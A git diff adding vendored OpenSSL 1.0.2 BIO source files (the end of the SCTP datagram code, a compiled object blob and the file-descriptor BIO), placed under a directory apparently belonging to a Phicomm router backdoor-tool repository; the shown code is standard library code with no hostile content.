+#  ifdef SCTP_AUTH_DEACTIVATE_KEY
+            sockopt_len = sizeof(struct sctp_authkeyid);
+            ret = setsockopt(b->num, IPPROTO_SCTP, SCTP_AUTH_DEACTIVATE_KEY,
+                             &authkeyid, sockopt_len);
+            if (ret < 0)
+                break;
+#  endif
+#  ifndef SCTP_AUTHENTICATION_EVENT
+            if (authkeyid.scact_keynumber > 0) {
+                authkeyid.scact_keynumber = authkeyid.scact_keynumber - 1;
+                ret = setsockopt(b->num, IPPROTO_SCTP, SCTP_AUTH_DELETE_KEY,
+                                 &authkeyid, sizeof(struct sctp_authkeyid));
+                if (ret < 0)
+                    break;
+            }
+#  endif
+
+            data->ccs_rcvd = 0;
+            data->ccs_sent = 0;
+        }
+        break;
+    case BIO_CTRL_DGRAM_SCTP_GET_SNDINFO:
+        /* Returns the size of the copied struct. */
+        if (num > (long)sizeof(struct bio_dgram_sctp_sndinfo))
+            num = sizeof(struct bio_dgram_sctp_sndinfo);
+
+        memcpy(ptr, &(data->sndinfo), num);
+        ret = num;
+        break;
+    case BIO_CTRL_DGRAM_SCTP_SET_SNDINFO:
+        /* Returns the size of the copied struct. */
+        if (num > (long)sizeof(struct bio_dgram_sctp_sndinfo))
+            num = sizeof(struct bio_dgram_sctp_sndinfo);
+
+        memcpy(&(data->sndinfo), ptr, num);
+        break;
+    case BIO_CTRL_DGRAM_SCTP_GET_RCVINFO:
+        /* Returns the size of the copied struct. */
+        if (num > (long)sizeof(struct bio_dgram_sctp_rcvinfo))
+            num = sizeof(struct bio_dgram_sctp_rcvinfo);
+
+        memcpy(ptr, &data->rcvinfo, num);
+
+        ret = num;
+        break;
+    case BIO_CTRL_DGRAM_SCTP_SET_RCVINFO:
+        /* Returns the size of the copied struct. */
+        if (num > (long)sizeof(struct bio_dgram_sctp_rcvinfo))
+            num = sizeof(struct bio_dgram_sctp_rcvinfo);
+
+        memcpy(&(data->rcvinfo), ptr, num);
+        break;
+    case BIO_CTRL_DGRAM_SCTP_GET_PRINFO:
+        /* Returns the size of the copied struct. */
+        if (num > (long)sizeof(struct bio_dgram_sctp_prinfo))
+            num = sizeof(struct bio_dgram_sctp_prinfo);
+
+        memcpy(ptr, &(data->prinfo), num);
+        ret = num;
+        break;
+    case BIO_CTRL_DGRAM_SCTP_SET_PRINFO:
+        /* Returns the size of the copied struct. */
+        if (num > (long)sizeof(struct bio_dgram_sctp_prinfo))
+            num = sizeof(struct bio_dgram_sctp_prinfo);
+
+        memcpy(&(data->prinfo), ptr, num);
+        break;
+    case BIO_CTRL_DGRAM_SCTP_SAVE_SHUTDOWN:
+        /* Returns always 1. */
+        if (num > 0)
+            data->save_shutdown = 1;
+        else
+            data->save_shutdown = 0;
+        break;
+
+    default:
+        /*
+         * Pass to default ctrl function to process SCTP unspecific commands
+         */
+        ret = dgram_ctrl(b, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+}
+
+int BIO_dgram_sctp_notification_cb(BIO *b,
+                                   void (*handle_notifications) (BIO *bio,
+                                                                 void
+                                                                 *context,
+                                                                 void *buf),
+                                   void *context)
+{
+    bio_dgram_sctp_data *data = (bio_dgram_sctp_data *) b->ptr;
+
+    if (handle_notifications != NULL) {
+        data->handle_notifications = handle_notifications;
+        data->notification_context = context;
+    } else
+        return -1;
+
+    return 0;
+}
+
+int BIO_dgram_sctp_wait_for_dry(BIO *b)
+{
+    int is_dry = 0;
+    int n, sockflags, ret;
+    union sctp_notification snp;
+    struct msghdr msg;
+    struct iovec iov;
+#  ifdef SCTP_EVENT
+    struct sctp_event event;
+#  else
+    struct sctp_event_subscribe event;
+    socklen_t eventsize;
+#  endif
+    bio_dgram_sctp_data *data = (bio_dgram_sctp_data *) b->ptr;
+
+    /* set sender dry event */
+#  ifdef SCTP_EVENT
+    memset(&event, 0, sizeof(struct sctp_event));
+    event.se_assoc_id = 0;
+    event.se_type = SCTP_SENDER_DRY_EVENT;
+    event.se_on = 1;
+    ret =
+        setsockopt(b->num, IPPROTO_SCTP, SCTP_EVENT, &event,
+                   sizeof(struct sctp_event));
+#  else
+    eventsize = sizeof(struct sctp_event_subscribe);
+    ret = getsockopt(b->num, IPPROTO_SCTP, SCTP_EVENTS, &event, &eventsize);
+    if (ret < 0)
+        return -1;
+
+    event.sctp_sender_dry_event = 1;
+
+    ret =
+        setsockopt(b->num, IPPROTO_SCTP, SCTP_EVENTS, &event,
+                   sizeof(struct sctp_event_subscribe));
+#  endif
+    if (ret < 0)
+        return -1;
+
+    /* peek for notification */
+    memset(&snp, 0x00, sizeof(union sctp_notification));
+    iov.iov_base = (char *)&snp;
+    iov.iov_len = sizeof(union sctp_notification);
+    msg.msg_name = NULL;
+    msg.msg_namelen = 0;
+    msg.msg_iov = &iov;
+    msg.msg_iovlen = 1;
+    msg.msg_control = NULL;
+    msg.msg_controllen = 0;
+    msg.msg_flags = 0;
+
+    n = recvmsg(b->num, &msg, MSG_PEEK);
+    if (n <= 0) {
+        if ((n < 0) && (get_last_socket_error() != EAGAIN)
+            && (get_last_socket_error() != EWOULDBLOCK))
+            return -1;
+        else
+            return 0;
+    }
+
+    /* if we find a notification, process it and try again if necessary */
+    while (msg.msg_flags & MSG_NOTIFICATION) {
+        memset(&snp, 0x00, sizeof(union sctp_notification));
+        iov.iov_base = (char *)&snp;
+        iov.iov_len = sizeof(union sctp_notification);
+        msg.msg_name = NULL;
+        msg.msg_namelen = 0;
+        msg.msg_iov = &iov;
+        msg.msg_iovlen = 1;
+        msg.msg_control = NULL;
+        msg.msg_controllen = 0;
+        msg.msg_flags = 0;
+
+        n = recvmsg(b->num, &msg, 0);
+        if (n <= 0) {
+            if ((n < 0) && (get_last_socket_error() != EAGAIN)
+                && (get_last_socket_error() != EWOULDBLOCK))
+                return -1;
+            else
+                return is_dry;
+        }
+
+        if (snp.sn_header.sn_type == SCTP_SENDER_DRY_EVENT) {
+            is_dry = 1;
+
+            /* disable sender dry event */
+#  ifdef SCTP_EVENT
+            memset(&event, 0, sizeof(struct sctp_event));
+            event.se_assoc_id = 0;
+            event.se_type = SCTP_SENDER_DRY_EVENT;
+            event.se_on = 0;
+            ret =
+                setsockopt(b->num, IPPROTO_SCTP, SCTP_EVENT, &event,
+                           sizeof(struct sctp_event));
+#  else
+            eventsize = (socklen_t) sizeof(struct sctp_event_subscribe);
+            ret =
+                getsockopt(b->num, IPPROTO_SCTP, SCTP_EVENTS, &event,
+                           &eventsize);
+            if (ret < 0)
+                return -1;
+
+            event.sctp_sender_dry_event = 0;
+
+            ret =
+                setsockopt(b->num, IPPROTO_SCTP, SCTP_EVENTS, &event,
+                           sizeof(struct sctp_event_subscribe));
+#  endif
+            if (ret < 0)
+                return -1;
+        }
+#  ifdef SCTP_AUTHENTICATION_EVENT
+        if (snp.sn_header.sn_type == SCTP_AUTHENTICATION_EVENT)
+            dgram_sctp_handle_auth_free_key_event(b, &snp);
+#  endif
+
+        if (data->handle_notifications != NULL)
+            data->handle_notifications(b, data->notification_context,
+                                       (void *)&snp);
+
+        /* found notification, peek again */
+        memset(&snp, 0x00, sizeof(union sctp_notification));
+        iov.iov_base = (char *)&snp;
+        iov.iov_len = sizeof(union sctp_notification);
+        msg.msg_name = NULL;
+        msg.msg_namelen = 0;
+        msg.msg_iov = &iov;
+        msg.msg_iovlen = 1;
+        msg.msg_control = NULL;
+        msg.msg_controllen = 0;
+        msg.msg_flags = 0;
+
+        /* if we have seen the dry already, don't wait */
+        if (is_dry) {
+            sockflags = fcntl(b->num, F_GETFL, 0);
+            fcntl(b->num, F_SETFL, O_NONBLOCK);
+        }
+
+        n = recvmsg(b->num, &msg, MSG_PEEK);
+
+        if (is_dry) {
+            fcntl(b->num, F_SETFL, sockflags);
+        }
+
+        if (n <= 0) {
+            if ((n < 0) && (get_last_socket_error() != EAGAIN)
+                && (get_last_socket_error() != EWOULDBLOCK))
+                return -1;
+            else
+                return is_dry;
+        }
+    }
+
+    /* read anything else */
+    return is_dry;
+}
+
+int BIO_dgram_sctp_msg_waiting(BIO *b)
+{
+    int n, sockflags;
+    union sctp_notification snp;
+    struct msghdr msg;
+    struct iovec iov;
+    bio_dgram_sctp_data *data = (bio_dgram_sctp_data *) b->ptr;
+
+    /* Check if there are any messages waiting to be read */
+    do {
+        memset(&snp, 0x00, sizeof(union sctp_notification));
+        iov.iov_base = (char *)&snp;
+        iov.iov_len = sizeof(union sctp_notification);
+        msg.msg_name = NULL;
+        msg.msg_namelen = 0;
+        msg.msg_iov = &iov;
+        msg.msg_iovlen = 1;
+        msg.msg_control = NULL;
+        msg.msg_controllen = 0;
+        msg.msg_flags = 0;
+
+        sockflags = fcntl(b->num, F_GETFL, 0);
+        fcntl(b->num, F_SETFL, O_NONBLOCK);
+        n = recvmsg(b->num, &msg, MSG_PEEK);
+        fcntl(b->num, F_SETFL, sockflags);
+
+        /* if notification, process and try again */
+        if (n > 0 && (msg.msg_flags & MSG_NOTIFICATION)) {
+#  ifdef SCTP_AUTHENTICATION_EVENT
+            if (snp.sn_header.sn_type == SCTP_AUTHENTICATION_EVENT)
+                dgram_sctp_handle_auth_free_key_event(b, &snp);
+#  endif
+
+            memset(&snp, 0x00, sizeof(union sctp_notification));
+            iov.iov_base = (char *)&snp;
+            iov.iov_len = sizeof(union sctp_notification);
+            msg.msg_name = NULL;
+            msg.msg_namelen = 0;
+            msg.msg_iov = &iov;
+            msg.msg_iovlen = 1;
+            msg.msg_control = NULL;
+            msg.msg_controllen = 0;
+            msg.msg_flags = 0;
+            n = recvmsg(b->num, &msg, 0);
+
+            if (data->handle_notifications != NULL)
+                data->handle_notifications(b, data->notification_context,
+                                           (void *)&snp);
+        }
+
+    } while (n > 0 && (msg.msg_flags & MSG_NOTIFICATION));
+
+    /* Return 1 if there is a message to be read, return 0 otherwise. */
+    if (n > 0)
+        return 1;
+    else
+        return 0;
+}
+
+static int dgram_sctp_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = dgram_sctp_write(bp, str, n);
+    return (ret);
+}
+# endif
+
+static int BIO_dgram_should_retry(int i)
+{
+    int err;
+
+    if ((i == 0) || (i == -1)) {
+        err = get_last_socket_error();
+
+# if defined(OPENSSL_SYS_WINDOWS)
+        /*
+         * If the socket return value (i) is -1 and err is unexpectedly 0 at
+         * this point, the error code was overwritten by another system call
+         * before this error handling is called.
+         */
+# endif
+
+        return (BIO_dgram_non_fatal_error(err));
+    }
+    return (0);
+}
+
+int BIO_dgram_non_fatal_error(int err)
+{
+    switch (err) {
+# if defined(OPENSSL_SYS_WINDOWS)
+#  if defined(WSAEWOULDBLOCK)
+    case WSAEWOULDBLOCK:
+#  endif
+
+#  if 0                         /* This appears to always be an error */
+#   if defined(WSAENOTCONN)
+    case WSAENOTCONN:
+#   endif
+#  endif
+# endif
+
+# ifdef EWOULDBLOCK
+#  ifdef WSAEWOULDBLOCK
+#   if WSAEWOULDBLOCK != EWOULDBLOCK
+    case EWOULDBLOCK:
+#   endif
+#  else
+    case EWOULDBLOCK:
+#  endif
+# endif
+
+# ifdef EINTR
+    case EINTR:
+# endif
+
+# ifdef EAGAIN
+#  if EWOULDBLOCK != EAGAIN
+    case EAGAIN:
+#  endif
+# endif
+
+# ifdef EPROTO
+    case EPROTO:
+# endif
+
+# ifdef EINPROGRESS
+    case EINPROGRESS:
+# endif
+
+# ifdef EALREADY
+    case EALREADY:
+# endif
+
+        return (1);
+        /* break; */
+    default:
+        break;
+    }
+    return (0);
+}
+
+static void get_current_time(struct timeval *t)
+{
+# if defined(_WIN32)
+    SYSTEMTIME st;
+    union {
+        unsigned __int64 ul;
+        FILETIME ft;
+    } now;
+
+    GetSystemTime(&st);
+    SystemTimeToFileTime(&st, &now.ft);
+#  ifdef  __MINGW32__
+    now.ul -= 116444736000000000ULL;
+#  else
+    now.ul -= 116444736000000000UI64; /* re-bias to 1/1/1970 */
+#  endif
+    t->tv_sec = (long)(now.ul / 10000000);
+    t->tv_usec = ((int)(now.ul % 10000000)) / 10;
+# elif defined(OPENSSL_SYS_VMS)
+    struct timeb tb;
+    ftime(&tb);
+    t->tv_sec = (long)tb.time;
+    t->tv_usec = (long)tb.millitm * 1000;
+# else
+    gettimeofday(t, NULL);
+# endif
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_dgram.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_dgram.o
new file mode 100644
index 0000000000000000000000000000000000000000..1cd65b268f0562b9f5783c6aad3b027df9332a3f
GIT binary patch
literal 9256
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
R`Zm1uf_%?NN>6kBe*hm4xbXl0

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_fd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_fd.c
new file mode 100644
index 0000000..5f4e344
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_fd.c
@@ -0,0 +1,330 @@
+/* crypto/bio/bss_fd.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#define USE_SOCKETS
+#include "cryptlib.h"
+
+#if defined(OPENSSL_NO_POSIX_IO)
+/*
+ * Dummy placeholder for BIO_s_fd...
+ */
+BIO *BIO_new_fd(int fd, int close_flag)
+{
+    return NULL;
+}
+
+int BIO_fd_non_fatal_error(int err)
+{
+    return 0;
+}
+
+int BIO_fd_should_retry(int i)
+{
+    return 0;
+}
+
+BIO_METHOD *BIO_s_fd(void)
+{
+    return NULL;
+}
+#else
+/*
+ * As for unconditional usage of "UPLINK" interface in this module.
+ * Trouble is that unlike Unix file descriptors [which are indexes
+ * in kernel-side per-process table], corresponding descriptors on
+ * platforms which require "UPLINK" interface seem to be indexes
+ * in a user-land, non-global table. Well, in fact they are indexes
+ * in stdio _iob[], and recall that _iob[] was the very reason why
+ * "UPLINK" interface was introduced in first place. But one way on
+ * another. Neither libcrypto or libssl use this BIO meaning that
+ * file descriptors can only be provided by application. Therefore
+ * "UPLINK" calls are due...
+ */
+# include "bio_lcl.h"
+
+static int fd_write(BIO *h, const char *buf, int num);
+static int fd_read(BIO *h, char *buf, int size);
+static int fd_puts(BIO *h, const char *str);
+static int fd_gets(BIO *h, char *buf, int size);
+static long fd_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int fd_new(BIO *h);
+static int fd_free(BIO *data);
+int BIO_fd_should_retry(int s);
+
+static BIO_METHOD methods_fdp = {
+    BIO_TYPE_FD, "file descriptor",
+    fd_write,
+    fd_read,
+    fd_puts,
+    fd_gets,
+    fd_ctrl,
+    fd_new,
+    fd_free,
+    NULL,
+};
+
+BIO_METHOD *BIO_s_fd(void)
+{
+    return (&methods_fdp);
+}
+
+BIO *BIO_new_fd(int fd, int close_flag)
+{
+    BIO *ret;
+    ret = BIO_new(BIO_s_fd());
+    if (ret == NULL)
+        return (NULL);
+    BIO_set_fd(ret, fd, close_flag);
+    return (ret);
+}
+
+static int fd_new(BIO *bi)
+{
+    bi->init = 0;
+    bi->num = -1;
+    bi->ptr = NULL;
+    bi->flags = BIO_FLAGS_UPLINK; /* essentially redundant */
+    return (1);
+}
+
+static int fd_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    if (a->shutdown) {
+        if (a->init) {
+            UP_close(a->num);
+        }
+        a->init = 0;
+        a->flags = BIO_FLAGS_UPLINK;
+    }
+    return (1);
+}
+
+static int fd_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+
+    if (out != NULL) {
+        clear_sys_error();
+        ret = UP_read(b->num, out, outl);
+        BIO_clear_retry_flags(b);
+        if (ret <= 0) {
+            if (BIO_fd_should_retry(ret))
+                BIO_set_retry_read(b);
+        }
+    }
+    return (ret);
+}
+
+static int fd_write(BIO *b, const char *in, int inl)
+{
+    int ret;
+    clear_sys_error();
+    ret = UP_write(b->num, in, inl);
+    BIO_clear_retry_flags(b);
+    if (ret <= 0) {
+        if (BIO_fd_should_retry(ret))
+            BIO_set_retry_write(b);
+    }
+    return (ret);
+}
+
+static long fd_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret = 1;
+    int *ip;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        num = 0;
+    case BIO_C_FILE_SEEK:
+        ret = (long)UP_lseek(b->num, num, 0);
+        break;
+    case BIO_C_FILE_TELL:
+    case BIO_CTRL_INFO:
+        ret = (long)UP_lseek(b->num, 0, 1);
+        break;
+    case BIO_C_SET_FD:
+        fd_free(b);
+        b->num = *((int *)ptr);
+        b->shutdown = (int)num;
+        b->init = 1;
+        break;
+    case BIO_C_GET_FD:
+        if (b->init) {
+            ip = (int *)ptr;
+            if (ip != NULL)
+                *ip = b->num;
+            ret = b->num;
+        } else
+            ret = -1;
+        break;
+    case BIO_CTRL_GET_CLOSE:
+        ret = b->shutdown;
+        break;
+    case BIO_CTRL_SET_CLOSE:
+        b->shutdown = (int)num;
+        break;
+    case BIO_CTRL_PENDING:
+    case BIO_CTRL_WPENDING:
+        ret = 0;
+        break;
+    case BIO_CTRL_DUP:
+    case BIO_CTRL_FLUSH:
+        ret = 1;
+        break;
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static int fd_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = fd_write(bp, str, n);
+    return (ret);
+}
+
+static int fd_gets(BIO *bp, char *buf, int size)
+{
+    int ret = 0;
+    char *ptr = buf;
+    char *end = buf + size - 1;
+
+    while ((ptr < end) && (fd_read(bp, ptr, 1) > 0) && (ptr[0] != '\n'))
+        ptr++;
+
+    ptr[0] = '\0';
+
